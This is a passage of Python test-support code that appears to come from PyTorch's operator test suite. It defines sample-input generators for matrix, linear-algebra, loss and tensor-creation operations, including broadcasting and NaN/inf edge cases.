requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) first_shape, second_shape = (S, M), (M, S) yield SampleInput(make_arg(first_shape), args=(make_arg(second_shape),)) if dtype.is_complex: yield SampleInput(make_arg(first_shape), args=(make_arg_conj(second_shape),)) def sample_inputs_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha_val = kwargs.get('alpha', 2 + 3j if dtype.is_complex else 0.6) beta_val = kwargs.get('beta', 1 + 2j if dtype.is_complex else 0.2) tests_list = [ ((2, 3), (2, 2), (2, 3), False) ] tests_with_lhs_broadcasting = [ ((1,), (2, 2), (2, 3), True), ((), (2, 2), (2, 3), True) ] test_cases = tests_list + tests_with_lhs_broadcasting # type: ignore[operator] sample_inputs = [] for shape_a, shape_b, shape_c, broadcasts_input in test_cases: sample_inputs.append( SampleInput( make_tensor(shape_a, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape_b, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape_c, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val}, broadcasts_input=broadcasts_input)) if dtype.is_complex: shape = (3, 3) sample_inputs.append( SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad), make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) sample_inputs.append( 
SampleInput(make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad), make_tensor(shape, dtype=dtype, device=device).mH.requires_grad_(requires_grad)), kwargs={'alpha': alpha_val, 'beta': beta_val},)) return sample_inputs def sample_inputs_sparse_sampled_addmm(op_info, device, dtype, requires_grad, **kwargs): alpha = 2 + 3j if dtype.is_complex else 0.6 beta = 1 + 2j if dtype.is_complex else 0.2 def generator(): # sparse.sampled_addmm performs: alpha * (A @ B) * sparse_ones_like(C) + beta * C for m, n, k in itertools.product([0, 5], repeat=3): yield SampleInput( torch.eye(m, n, device=device, dtype=dtype) .to_sparse_csr() .requires_grad_(requires_grad), args=( make_tensor( (m, k), device=device, dtype=dtype, requires_grad=requires_grad, ), make_tensor( (k, n), device=device, dtype=dtype, requires_grad=requires_grad, ), ), kwargs={"alpha": alpha, "beta": beta}, ) return list(generator()) def sample_inputs_mv(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_bmm(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((M, S, M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((M, M, S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), ) ), ) def sample_inputs_dot_vdot(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_arg_conj(size): return make_arg(size).conj().requires_grad_(requires_grad) sample_inputs = [] sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg((S, )),))) if dtype.is_complex: # dot/vdot for (conj(input), conj(arg_tensor)) and (conj(input), arg_tensor) # is tested in test_conj_view (which tests operations with only conjugated input tensor # -- not conjugated arg tensors) sample_inputs.append(SampleInput(make_arg((S, )), args=(make_arg_conj((S, )),))) return sample_inputs def sample_inputs_addmv(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases = (((S,), (S, M), (M,), 1, 1, False), ((S,), (S, M), (M,), 0.2, 0.6, False), ) test_cases_with_broadcast = (((1,), (S, M), (M,), 1, 1, True), ((1,), (S, M), (M,), 0.2, 0.6, True), ((), (S, M), (M,), 1, 1, True), ((), (S, M), (M,), 0.2, 0.6, True), ) cases = test_cases + test_cases_with_broadcast # addmv performs: beta * M + alpha * (mat @ vec) for size, mat, vec, beta, alpha, broadcasts_input in cases: yield SampleInput(make_arg(size), args=(make_arg(mat), make_arg(vec)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input) def sample_inputs_addbmm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # input_shape, batch1_shape, batch2_shape, beta_val, alpha_val, is_broadcasting test_cases = [((S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] for input_shape, 
batch1_shape, batch2_shape, beta, alpha, is_broadcasting in test_cases: if dtype.is_complex: beta_complex, alpha_complex = beta * (1 + 2j), alpha * (2 + 3j) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta_complex, alpha=alpha_complex), broadcasts_input=is_broadcasting) yield SampleInput(make_arg(input_shape), args=(make_arg(batch1_shape), make_arg(batch2_shape)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=is_broadcasting) def sample_inputs_addcmul_addcdiv(op_info, device, dtype, requires_grad, **kwargs): test_cases = [(((S, S), (S, S), (S, S)), False), (((S, S), (S, 1), (1, S)), False), (((1,), (S, S, 1), (1, S)), True), (((), (), ()), False), (((S, S), (), ()), True), (((), (S, S, 1), (1, S)), True) ] sample_inputs = [] for input_args, broadcasts_input in test_cases: # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], broadcasts_input=broadcasts_input)) # addcdiv should accept inputs with zero value # Currently, it throws ZeroDivisionError when the denominator is zero # TODO: exclude_zeros can be removed after https://github.com/pytorch/pytorch/issues/73638 is fixed args = tuple(make_tensor(arg, dtype=dtype, device=device, requires_grad=requires_grad, exclude_zero=True) if isinstance(arg, tuple) else arg for arg in input_args) sample_inputs.append(SampleInput( args[0], args=args[1:], kwargs=dict(value=3.14), broadcasts_input=broadcasts_input)) return tuple(sample_inputs) def sample_inputs_baddbmm(op_info, device, dtype, requires_grad, **kwargs): test_cases = [((S, S, M), (S, S, S), (S, S, M), 1, 1, False), ((1,), (S, S, S), (S, S, M), 1, 1, True), ((S, S, M), (S, S, S), (S, S, M), 0.6, 0.2, False), ((1,), (S, S, S), (S, S, M), 0.6, 0.2, True), ((), (S, S, S), (S, S, M), 1, 1, True), ((), (S, S, S), (S, S, M), 0.6, 0.2, True), ] sample_inputs = [] for (input_shape, batch1_shape, batch2_shape, alpha, beta, broadcasts_input) in test_cases: args = (make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch1_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(batch2_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append(SampleInput(args[0], args=(args[1], args[2]), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=broadcasts_input)) if dtype.is_complex: sample_inputs.append(SampleInput( args[0].clone().requires_grad_(requires_grad), args=(args[1].clone().requires_grad_(requires_grad), args[2].clone().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)), broadcasts_input=broadcasts_input)) if dtype.is_complex: shapes = [(S, S, S), (S, M, S), (S, S, M)] args = (make_tensor(shapes[0], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[1], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor(shapes[2], dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) sample_inputs.append( SampleInput( args[0].transpose_(-1, 1), 
args=(args[1].transpose(-1, 1).conj().requires_grad_(requires_grad), args[2].transpose(-1, 1).conj().requires_grad_(requires_grad)), kwargs=dict(beta=beta * (1 + 2j), alpha=alpha * (2 + 3j)),)) return tuple(sample_inputs) # TODO: add reduction kwargs def sample_inputs_multilabel_soft_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (S,), (S, S), ) for shape in shapes: # Produce one with weight and one without. yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={}) yield SampleInput(_make_tensor(shape), args=(_make_tensor(shape, requires_grad=False),), kwargs={'weight': _make_tensor(shape, requires_grad=False)}) def sample_inputs_addr(op_info, device, dtype, requires_grad, **kwargs): yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), broadcasts_input=True) if dtype.is_complex: alpha, beta = 0.1 + 0.3j, 0.4 + 0.6j elif dtype.is_floating_point: alpha, beta = 0.2, 0.6 else: alpha, beta = 2, 3 yield SampleInput( make_tensor((S, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha)) yield SampleInput( make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), make_tensor((M, ), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), kwargs=dict(beta=beta, alpha=alpha), broadcasts_input=True) # These samples fail gradcheck if dtype.is_floating_point and not requires_grad: yield SampleInput( torch.tensor([[math.nan]], device=device, requires_grad=requires_grad), args=( torch.tensor([0.0], device=device, requires_grad=requires_grad), torch.tensor([0.0], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) yield SampleInput( torch.tensor([[0.0]], device=device, requires_grad=requires_grad), args=( torch.tensor([math.nan], device=device, requires_grad=requires_grad), torch.tensor([math.nan], device=device, requires_grad=requires_grad), ), kwargs=dict(beta=0.0, alpha=0.0), broadcasts_input=True) def sample_inputs_zero_(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ((), (S, S, S), (S,)) for shape in cases: yield(SampleInput(make_arg(shape))) # TODO: add reduction kwargs def sample_inputs_multi_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, 
dtype=torch.long, requires_grad=False) inputs = ( ((), make_target([], low=0, high=1), {}), ((S,), make_target([], low=0, high=S), {"p": 1}), ((S,), make_target([1], low=0, high=S), {"p": 2}), ((S, M), make_target([S], low=0, high=M), {"margin": 1.0}), ((M, S), make_target([M], low=0, high=S), {"weight": None}), ) for input_shape, target, kwargs in inputs: yield SampleInput(_make_tensor(input_shape), args=(target,), kwargs=kwargs) def sample_inputs_logsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((), (0,), True), ((S, S), (1,), True), ((S, S), (1,), False), ((S, S), (-2,), False), ) samples = [] # Test large inputs to check numerical stability lows = (None, 1e3, 1e6) if dtype in (torch.float32, torch.float64) else (None,) for low in lows: high = low * 2 if low is not None else None for shape, dim, keepdim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples.append(SampleInput(t, args=(dim, keepdim))) return tuple(samples) def sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): inputs = [ ((), {}), ((S, S), {}), ((0, S, 0), {}), ((S,), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), {'dtype': torch.double}), ((S,), {'device': 'cpu'}), ((S,), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), {'device': 'cuda'})) samples = [] for shape, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, kwargs=kwargs)) return tuple(samples) def reference_inputs_like_fns(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_like_fns(op, device, dtype, requires_grad, **kwargs) # shape cases = ( (), (0,), (1, 0), (1, 1, 4, 5), (5, 3, 0, 1), (1, 4, 3, 1, 1) ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in cases: yield SampleInput(make_arg(shape)) yield SampleInput(make_arg(shape).transpose(0, -1)) yield SampleInput(make_arg(shape, noncontiguous=True)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1)) # TODO: add reduction kwargs def sample_inputs_multilabel_margin_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_target = partial(_make_tensor, dtype=torch.long, requires_grad=False) inputs = ( ([], make_target([], low=0, high=1)), ([S], make_target([S], low=0, high=S)), ([M, S], make_target([M, S], low=0, high=S)), ) for shape, target in inputs: yield SampleInput(_make_tensor(shape), args=(target,)) def get_independent_tensor(tensor): return tensor.clone().requires_grad_(tensor.requires_grad) def sample_inputs_randint_like(self, device, dtype, requires_grad, **kwargs): samples = [] low = 2 high = 10 for sample in sample_inputs_like_fns(self, device, dtype, requires_grad, **kwargs): # With high samples.append(SampleInput( sample.input, args=(high,) + sample.args, kwargs=sample.kwargs)) # With low and high samples.append(SampleInput( get_independent_tensor(sample.input), args=(low, high,) + sample.args, kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_margin_ranking_loss(op_info, device, dtype, requires_grad, **kwargs): _make_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( (), (S,), (S, S), (S, 
S, S), )
    margins = (0., 1.)
    reductions = ('sum', 'mean', 'none')

    for shape in shapes:
        for margin, reduction in product(margins, reductions):
            kwargs = {'margin': margin, 'reduction': reduction}
            yield SampleInput(_make_tensor(shape),
                              args=(_make_tensor(shape, requires_grad=False),
                                    _make_tensor(shape, requires_grad=False)),
                              kwargs=kwargs)

def reference_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs):
    yield from sample_inputs_margin_ranking_loss(op, device, dtype, requires_grad, **kwargs)

    make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    for reduction in ('sum', 'mean', 'none'):
        if dtype.is_floating_point:  # only supports ints and floats
            # NaN propagation
            inp1 = make_input((10, ))
            inp1[2] = float('nan')
            inp2 = make_input((10, ))
            inp2[4] = float('nan')
            target = make_input((10, ))
            target[9] = float('nan')
            yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction})

            # Inf handling
            inp1 = make_input((10, ))
            inp1[1] = float('inf')
            inp2 = make_input((10, ))
            inp2[4] = float('inf')
            target = make_input((10, ))
            target[7] = float('inf')
            yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction})

        # Broadcasting
        inp1 = make_input((5, 2))
        inp2 = make_input((5, 1))
        target = make_input((1, 2))
        yield SampleInput(inp1, args=(inp2, target), kwargs={'reduction': reduction})

def error_inputs_margin_ranking_loss(op, device, **kwargs):
    make_input = partial(make_tensor, device=device, dtype=torch.float32)

    # invalid reduction value.
    yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5, 4),),
                                 kwargs={'reduction': 'abc'}),
                     error_type=ValueError, error_regex='is not a valid value')

    # invalid input shapes
    yield ErrorInput(SampleInput(make_input(5, 4), args=(make_input(5, 4), make_input(5,),)),
                     error_regex='margin_ranking_loss : All input tensors should')

def sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs):
    inputs = [
        ((), (), {}),
        ((S, S), (2, 0), {}),
        ((0, S, 0), (3, 2, 2), {}),
        ((S,), (2, 3), {'dtype': dtype, 'device': device}),
        # Hard-code some dtypes/devices.
We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), (10,), {'dtype': torch.double}), ((S,), (1, 1, 12), {'device': 'cpu'}), ((S,), (2, 2, 2), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), (7, 2), {'device': 'cuda'})) samples = [] for input_shape, output_shape, kwargs in inputs: t = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(output_shape,), kwargs=kwargs)) return tuple(samples) def sample_inputs_empty(op, device, dtype, requires_grad, **kwargs): # shape cases = ( (), (0,), (1,), (1, 3, 5), (5, 3, 1), (1, 0, 5, 1), ) for case in cases: _kwargs = {'device': device, 'dtype': dtype, 'requires_grad': requires_grad} yield SampleInput(case, args=(), kwargs=_kwargs) def sample_inputs_new_full(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() samples = [] for sample in sample_inputs_new_fns(self, device, dtype, requires_grad, **kwargs): # The scalar we are passing to new_full must be the same dtype # as the one of the resulting tensor use_dtype = sample.kwargs['dtype'] if 'dtype' in sample.kwargs else dtype samples.append(SampleInput( sample.input, args=sample.args + (get_val(use_dtype),), kwargs=sample.kwargs)) return tuple(samples) def sample_inputs_full_like(self, device, dtype, requires_grad, **kwargs): def get_val(dtype): return make_tensor([], dtype=dtype, device="cpu").item() inputs = [ ((), get_val(dtype), {}), ((S, S), get_val(dtype), {}), ((0, S, 0), get_val(dtype), {}), ((S,), get_val(dtype), {'dtype': dtype, 'device': device}), # Hard-code some dtypes/devices. We want to test cases where the # (dtype, device) is different from the input's (dtype, device) ((S,), get_val(torch.double), {'dtype': torch.double}), ((S,), get_val(dtype), {'device': 'cpu'}), ((S,), get_val(torch.double), {'dtype': torch.double, 'device': 'cpu'}), ] if torch.cuda.is_available(): inputs.append(((S,), get_val(dtype), {'device': 'cuda'})) samples = [] for shape, fill_value, kwargs in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(fill_value,), kwargs=kwargs)) return tuple(samples) def sample_inputs_multinomial(self, device, dtype, requires_grad, **kwargs): cases = [ ([3], 3, dict()), ([10], 3, dict()), ([3, 10], 3, dict()), ([3], 3, dict(replacement=False)), ([3], 3, dict(replacement=True)), ([3, 4], 4, dict(replacement=True)), ([3, 4], 4, dict(replacement=False)), ] samples = [] for shape, num_samples, kwargs in cases: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) samples.append(SampleInput(t, args=(num_samples,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs): def get_value_or_make_tensor(value_or_shape): if isinstance(value_or_shape, list): return make_tensor(value_or_shape, dtype=dtype, device=device, low=0, high=None, requires_grad=requires_grad) return value_or_shape samples = [] for value_or_mean_shape, value_or_std_shape, kwargs in cases: mean = get_value_or_make_tensor(value_or_mean_shape) std = get_value_or_make_tensor(value_or_std_shape) samples.append(SampleInput(mean, args=(std,), kwargs=kwargs)) return tuple(samples) def sample_inputs_normal_tensor_first(self, device, dtype, requires_grad, **kwargs): # 
value_or_size, value_or_size, kwargs cases = [ ([], [], {}), ([3], [3], {}), ([3, 4, 2], [3, 4, 2], {}), ([2, 3], 1.1, {}), ([1, 2, 3], [5, 2, 3], {}), # broadcasting ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_normal_tensor_second(self, device, dtype, requires_grad, **kwargs): cases = [ ([3, 4], 0.3, {}), ] return sample_inputs_normal_common(self, device, dtype, requires_grad, cases, **kwargs) def sample_inputs_bernoulli(self, device, dtype, requires_grad, **kwargs): shapes = [ [3], [], [0, 3], [2, 3, 4], ] samples = [] for shape in shapes: t = make_tensor(shape, dtype=dtype, device=device, low=0, high=1, requires_grad=requires_grad) samples.append(SampleInput(t)) return tuple(samples) def sample_inputs_logcumsumexp(self, device, dtype, requires_grad, **kwargs): inputs = ( ((S, S, S), 0), ((S, S, S), 1), ((), 0), ) samples = [] for large_number in (True, False): for shape, dim in inputs: t = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if large_number and t.dim() > 0: t[0] = 10000 samples.append(SampleInput(t, args=(dim,))) return tuple(samples) def sample_inputs_trace(self, device, dtype, requires_grad, **kwargs): return (SampleInput((make_tensor((S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad))),) def sample_inputs_renorm(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((S, S, S), (2, 1, 0.5)), ((S, S, S), (2, -1, 0.5)), ((S, S, S), (1, 2, 3)), ((S, S, S), (float('inf'), 2, 0.5)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_transpose_swapdims(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((1, 2, 3), (-1, -2)), ((1, 2, 3), (-1, 2)), ((1, 2, 3), (1, -2)), ((1, 2, 3), (1, 2)), ((), (0, 0)), ((1, ), (0, 0)), ((M, M), (0, 1)), ((S, S, S), (2, 0)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def _numpy_ref_transpose(a, dim0, dim1): if a.ndim <= 1: return a return np.swapaxes(a, dim0, dim1) def sample_inputs_adjoint(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((1, 2, 3), (), (M, M), (S, S, S), (S, M, S), (M, S, M, S)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_T(self, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (M, M)) return (SampleInput(make_arg(shape)) for shape in shapes) def sample_inputs_linalg_invertible(op_info, device, dtype, requires_grad=False, **kwargs): """ This function generates invertible inputs for linear algebra ops The input is generated as the itertools.product of 'batches' and 'ns'. In total this function generates 8 SampleInputs 'batches' cases include: () - single input, (0,) - zero batched dimension, (2,) - batch of two matrices, (1, 1) - 1x1 batch of matrices 'ns' gives 0x0 and 5x5 matrices. Zeros in dimensions are edge cases in the implementation and important to test for in order to avoid unexpected crashes. 
""" make_fn = make_fullrank_matrices_with_distinct_singular_values make_arg = partial(make_fn, dtype=dtype, device=device, requires_grad=requires_grad) batches = [(), (0, ), (2, ), (1, 1)] ns = [5, 0] for batch, n in product(batches, ns): yield SampleInput(make_arg(*batch, n, n)) def sample_inputs_linalg_pinv_singular(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces factors `a` and `b` to generate inputs of the form `a @ b.t()` to test the backward method of `linalg_pinv`. That way we always preserve the rank of the input no matter the perturbations applied to it by the gradcheck. Note that `pinv` is Frechet-differentiable in a rank-preserving neighborhood. """ batches = [(), (0, ), (2, ), (1, 1)] # the size of at least 30 is required to cause failures for the previous implicit implementation # of the pinv's backward method, albeit it is slow. size = [0, 3, 50] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): # Note that by making the columns of `a` and `b` orthonormal we make sure that # the product matrix `a @ b.t()` has condition number 1 when restricted to its image a = torch.rand(*batch, m, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) b = torch.rand(*batch, n, k, device=device, dtype=dtype).qr().Q.requires_grad_(requires_grad) yield SampleInput(a, args=(b,)) def sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad=False, **kwargs): """ This function produces two tensors of shape (*, m, k) and (*, n, k) with k <= min(m, n). Their matrix product could be used to generate tensor of shape (*, m, n) of rank k. """ batches = [(), (0, ), (2, ), (1, 1)] size = [1, 5, 10] for batch, m, n in product(batches, size, size): for k in range(min(3, min(m, n))): a = make_tensor((*batch, m, k), dtype=dtype, device=device, requires_grad=requires_grad) b = make_tensor((*batch, n, k), dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(a, args=(b,), kwargs=kwargs) def clone_sample(sample, **kwargs): """ Given a SampleInput, this function analyzes its input, args and kwargs, and produces a copy with each non-Tensor entry being copied by reference, and with each Tensor entry cloned with `t.clone().requires_grad_(t.requires_grad)` """ def clone_tensor(t): if isinstance(t, torch.Tensor): return t.detach().clone().requires_grad_(t.requires_grad) else: return t sample_kwargs = kwargs if kwargs else sample.kwargs return SampleInput( clone_tensor(sample.input), args=tuple(map(clone_tensor, sample.args)), kwargs=dict(((k, clone_tensor(v)) for k, v in sample_kwargs.items())) ) def sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad=False, **kwargs): for sample in sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad, **kwargs): *batch, m, k = sample.input.shape *_, n, _ = sample.args[0].shape # NOTE: since svd_lowrank relies on non rank-revealing SVD, # it inherits the problem of unstable behavior with repeated # singular values including zeros. # Since we want to avoid (repeated) zeros as singular values, # we can only use k for q. # This issues could be resolved with using a rank-revealing SVD # which does not include "zero" singular values. 
def sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad=False, **kwargs):
    for sample in sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad, **kwargs):
        *batch, m, k = sample.input.shape
        *_, n, _ = sample.args[0].shape

        # NOTE: since svd_lowrank relies on non rank-revealing SVD,
        # it inherits the problem of unstable behavior with repeated
        # singular values including zeros.
        # Since we want to avoid (repeated) zeros as singular values,
        # we can only use k for q.
        # This issue could be resolved with using a rank-revealing SVD
        # which does not include "zero" singular values.
        op_kwargs = {
            'q': k,
            'M': None
        }

        # without M specified
        yield clone_sample(sample, **op_kwargs)

        # now with M
        # TODO: fix bug in the documentation for svd_lowrank:
        # M has to be (*, m, n), and not (*, 1, n) as written
        # in the documentation
        op_kwargs['M'] = make_tensor((*batch, m, n), dtype=dtype, device=device, requires_grad=requires_grad)
        yield clone_sample(sample, **op_kwargs)

def chunk_iter(iterable, size):
    it = iter(iterable)
    while True:
        chunk = tuple(islice(it, size))
        if not chunk:
            break
        yield chunk

def sample_inputs_pca_lowrank(op_info, device, dtype, requires_grad=False, **kwargs):
    # we reuse samples from svd_lowrank which come in group of two with
    # kwarg['M'] = None and with kwarg['M'] = <some tensor>
    samples = sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad, **kwargs)
    for s1, s2 in chunk_iter(samples, 2):
        del s1.kwargs['M']
        del s2.kwargs['M']
        s1.kwargs['center'] = False
        s2.kwargs['center'] = True
        yield s1
        yield s2

def sample_inputs_linalg_cond(op_info, device, dtype, requires_grad=False, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    # autograd is not supported for inputs with zero number of elements
    shapes = ((S, S),
              (2, S, S),
              (2, 1, S, S), )

    for shape in shapes:
        yield SampleInput(make_arg(shape))

def sample_inputs_linalg_vander(op_info, device, dtype, requires_grad=False, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    shapes = ((),
              (1,),
              (S,),
              (2, S),)

    for shape in shapes:
        if len(shape) > 0 and shape[-1] > 1:
            yield SampleInput(make_arg(shape))
        n = shape[-1] if len(shape) > 0 else 1
        for i in range(3):
            # n-1, n, n+1
            N = n + i - 1
            if N < 2:
                continue
            yield SampleInput(make_arg(shape), kwargs=dict(N=N))

def np_vander_batched(x, N=None):
    # Wrapper around np.vander that supports batches of 1 dimension (enough for the tests)
    if x.ndim == 0:
        x = x[np.newaxis]
    if x.ndim == 1:
        y = np.vander(x, N=N, increasing=True)
        return y
    else:
        if N is None:
            N = x.shape[-1]
        y = np.vander(x.ravel(), N=N, increasing=True).reshape((*x.shape, N))
        return y
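# Illustrative sketch (assumption: not part of the original suite): for 1-D input,
# np_vander_batched matches np.vander with increasing=True, i.e. each row is
# [1, x, x**2, ...].
def _example_np_vander_batched():
    x = np.array([1.0, 2.0, 3.0])
    expected = np.vander(x, N=3, increasing=True)
    return np.array_equal(np_vander_batched(x, N=3), expected)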
def np_sinc_with_fp16_as_fp32(x):
    # Wraps numpy's sinc function so that fp16 values are promoted to fp32
    # before sinc is invoked. Context: numpy's sinc returns NaN when evaluated
    # at 0 for fp16.
    if x.dtype == np.float16:
        return np.sinc(x.astype(np.float32))
    else:
        return np.sinc(x)

def sample_inputs_broadcast_to(op_info, device, dtype, requires_grad, **kwargs):
    test_cases = (
        ((S, 1, 1), (S, S, S)),
        ((S, 1, S), (S, S, S)),
        ((S, 1), (S, S, S)),
        ((1,), (S, S, S)),
        ((1, S), (1, 1, S)),
        ((), ()),
        ((), (1, 3, 2)),
    )

    return tuple(
        SampleInput(
            make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(shape,)) for size, shape in test_cases)

def sample_inputs_broadcast_tensors(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
